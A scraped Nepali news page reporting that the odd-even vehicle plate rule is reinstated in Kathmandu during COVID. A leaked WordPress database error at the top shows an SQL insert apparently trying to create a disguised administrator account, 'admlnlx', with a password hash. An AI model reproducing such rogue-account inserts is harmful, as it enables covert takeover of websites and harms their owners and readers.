WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvIPbQNO0KduJYUgfhEBAc44nKDP.G.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 11:41:28', '', 'admlnlx', 'admlnlx')

जोरविजोर प्रणालीः आजबाट पुन लागु – Gaule Khabar

जोरविजोर प्रणालीः आजबाट पुन लागु

जोरविजोर प्रणालीः आजबाट पुन लागु

गाउँले न्युज, काठमाण्डौ । सरकारले आजबाट पुनः सवारी साधनमा जोरबिजोर प्रणाली लागु गरेको छ ।

गृह मन्त्रालयले निजी तथा सार्वजनिक सवारी साधनमा जोरबिजोर प्रणाली लागु हुने जानकारी दिएको हो । गृह मन्त्रालयको निर्णय अनुसार महानगरीय ट्राफिक प्रहरी महाशाखाले जोर गतेका दिन जोर नम्बर भएका सवारी गुड्ने छन् । त्यस्तै बिजोर गतेका दिन बिजोर नम्बर प्लेट सवारी । यस नियम अनुसार आज जोर नम्बर प्लेट भएका सवारी सडकमा देखिएका छन् ।

झन्डै आधा सवारी साधनको सङ्ख्या कम हुँदा काठमाडौंको उपत्यकाभित्रका सडक खाली खाली देखिएको छ । सामान्य दिनमा १० लाख सवारी साधन उपत्यकाभित्र गुड्ने गरेको ट्राफिक प्रहरीको तथ्याङ्कले देखाउँछ ।

२ सय कोरोना संक्रमित भएका सबै जिल्लाहरुमा यो नियम लागू हुनेछ । महानगरीय ट्राफिक प्रहरी महाशाखाका एसएसपी भीम ढकालले नियम पालना नगर्ने सवारी चालकलाई कारबाही गर्ने बताए । सरकारले असार २६ गतेदेखि जोरबिजोर प्रणाली हटाएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका